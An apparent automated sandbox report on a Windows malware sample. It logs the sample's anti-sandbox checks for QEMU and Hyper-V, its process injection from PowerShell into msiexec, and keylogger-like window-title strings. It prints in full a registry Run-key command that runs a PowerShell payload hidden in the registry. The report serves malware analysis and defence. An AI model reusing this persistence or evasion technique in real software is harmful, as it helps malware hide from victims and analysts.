Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEBS5M
Source: powershell.exe, 00000002.00000002.274407978909.0000000006F50000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274581380265.00000000082D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9927

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe TID: 460

Thread sleep count: 2100 > 30

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msiexec.exe

Thread sleep count: Count: 2100 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	File Volume queried: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	File Volume queried: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\determinationens\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\	Jump to behavior

Source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exebs5m
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: powershell.exe, 00000002.00000002.274407978909.0000000006F50000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274581380265.00000000082D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	API call chain: ExitProcess graph end node			graph_0-3500
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	API call chain: ExitProcess graph end node			graph_0-3504

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_03057711 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

2_2_03057711

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2CF0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2CBFF30			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"	Jump to behavior

Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerHY\odu
Source: msiexec.exe, 00000006.00000002.274580776368.00000000069E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.dr	Binary or memory string: [2024/10/06 05:47:10 Program Manager]
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerArthur
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerHY\ot=Fw
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerHY\
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0s\ArtAw
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0\
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerHY\3
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:1\C:\
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1:1onsolOw
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerHY\16w
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerHY\;wo
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerUSERPRO
Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerZ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
